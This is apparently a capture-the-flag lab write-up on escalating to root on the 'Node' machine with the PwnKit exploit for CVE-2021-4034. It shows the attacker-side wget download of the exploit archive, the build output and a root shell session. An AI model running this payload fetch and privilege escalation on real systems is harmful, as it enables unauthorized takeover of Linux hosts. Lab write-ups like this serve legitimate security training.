InfoSec LAB

Node_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034 The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit):

I Found an exploit online

Privilege Escalation

mark@node:/dev/shm$ wget http://10.10.14.5:8000/main.zip 
--2023-01-19 23:59:52--  http://10.10.14.5:8000/main.zip
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 6457 (6.3K) [application/zip]
saving to: 'main.zip'
 
main.zip                      100%[================================================>]   6.31K  --.-KB/s    in 0s      
 
2023-01-19 23:59:52 (1023 MB/s) - 'main.zip' saved [6457/6457]
 
mark@node:/dev/shm$ unzip main.zip
archive:  main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
   creating: CVE-2021-4034-main/
  inflating: CVE-2021-4034-main/.gitignore  
  inflating: CVE-2021-4034-main/LICENSE  
  inflating: CVE-2021-4034-main/Makefile  
  inflating: CVE-2021-4034-main/README.md  
  inflating: CVE-2021-4034-main/cve-2021-4034.c  
  inflating: CVE-2021-4034-main/cve-2021-4034.sh  
   creating: CVE-2021-4034-main/dry-run/
  inflating: CVE-2021-4034-main/dry-run/Makefile  
  inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c  
  inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c  
  inflating: CVE-2021-4034-main/pwnkit.c  
 
mark@node:/dev/shm$ cd CVE-2021-4034-main/
mark@node:/dev/shm/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.
 
mark@node:/dev/shm/CVE-2021-4034-main$ ./cve-2021-4034
#
# whoami
root
# hostname
node
# ifconfig
ens33     link encap:Ethernet  HWaddr 00:50:56:b9:42:eb  
          inet addr:10.10.10.58  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:42eb/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:168074 errors:0 dropped:164 overruns:0 frame:0
          tx packets:47777 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:17170815 (17.1 MB)  TX bytes:35834502 (35.8 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:522848 errors:0 dropped:0 overruns:0 frame:0
          tx packets:522848 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:42871115 (42.8 MB)  TX bytes:42871115 (42.8 MB)

System Level Compromise

Interactive Graph View

Backlinks